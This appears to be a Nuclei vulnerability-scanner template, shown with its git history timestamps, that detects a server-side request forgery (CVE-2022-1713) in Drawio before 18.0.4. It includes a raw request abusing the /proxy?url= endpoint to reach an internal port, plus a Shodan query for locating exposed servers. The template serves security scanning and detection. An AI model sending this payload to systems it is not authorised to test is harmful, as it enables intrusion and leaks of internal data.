nuclei-templates/cves/2022/CVE-2022-1713.yaml

42 lines
1.2 KiB
YAML
Raw Normal View History

2022-05-26 19:13:38 +00:00
id: CVE-2022-1713
info:
name: Drawio <18.0.4 - Server-Side Request Forgery
2022-05-26 19:13:38 +00:00
author: pikpikcu
severity: high
2022-05-27 04:29:02 +00:00
description: |
Drawio prior to 18.0.4 is vulnerable to server-side request forgery. An attacker can make a request as the server and read its contents. This can lead to a leak of sensitive information.
2022-05-27 04:29:02 +00:00
reference:
2022-05-26 19:13:38 +00:00
- https://huntr.dev/bounties/cad3902f-3afb-4ed2-abd0-9f96a248de11
- https://github.com/jgraph/drawio/commit/283d41ec80ad410d68634245cf56114bc19331ee
- https://nvd.nist.gov/vuln/detail/CVE-2022-1713
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1713
cwe-id: CWE-918
2022-05-27 04:29:02 +00:00
metadata:
2022-07-02 11:56:24 +00:00
verified: true
2022-05-27 04:29:02 +00:00
shodan-query: http.title:"Flowchart Maker"
tags: cve,cve2022,drawio,ssrf,oss
2022-05-26 19:13:38 +00:00
requests:
- raw:
2022-05-27 04:29:02 +00:00
- |
2022-05-26 19:13:38 +00:00
GET /proxy?url=http%3a//0:8080/ HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
2022-05-27 04:29:02 +00:00
part: body
words:
- "<title>Flowchart Maker & Online Diagram Software</title>"
2022-05-27 04:29:02 +00:00
- type: word
part: header
2022-05-26 19:13:38 +00:00
words:
2022-05-27 04:29:02 +00:00
- "application/octet-stream"
# Enhanced by mp on 2022/06/29